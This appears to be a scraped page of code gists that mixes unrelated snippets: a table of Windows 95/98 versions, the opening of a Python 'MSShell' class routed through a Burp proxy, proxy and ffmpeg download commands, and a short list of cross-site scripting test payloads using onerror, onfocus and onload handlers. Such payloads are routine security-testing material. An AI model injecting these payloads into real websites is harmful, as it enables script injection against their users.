Name Version Build Release Date RTM Date
Windows 95 4.00 950 1995-08-24
Windows 95 OEM Service Release 1 4.00 950 A 1996-02-14
Windows 95 OEM Service Release 2 4.00 950 B 1996-08-24
Windows 95 OEM Service Release 2.1 4.00 950 B 1997-08-27
Windows 95 OEM Service Release 2.5 4.00 950 C 1997-11-26
Windows 98 4.10 1998 1998-05-15
Windows 98 Second Edition (SE) 4.10 2222 1999-05-05
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # -*- coding: UTF-8 -*- | |
| import requests | |
| from base64 import b64decode | |
| from urllib.parse import unquote | |
| class MSShell(object): | |
| def __init__(self, burp="http://127.0.0.1:8080"): |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # If use Proxy | |
| export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890 | |
| # download | |
| ffmpeg -i https://PATH.m3u8 -acodec copy -vcodec copy -f mp4 output.mp4 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- onerror --> | |
| <img src=1 onerror=alert("xss")/> | |
| <!-- onfocus --> | |
| <input onfocus="alert('xss')"/> | |
| <!-- onload --> | |
| <svg onload=alert("xss")/> | |
| <!-- onmouseover --> |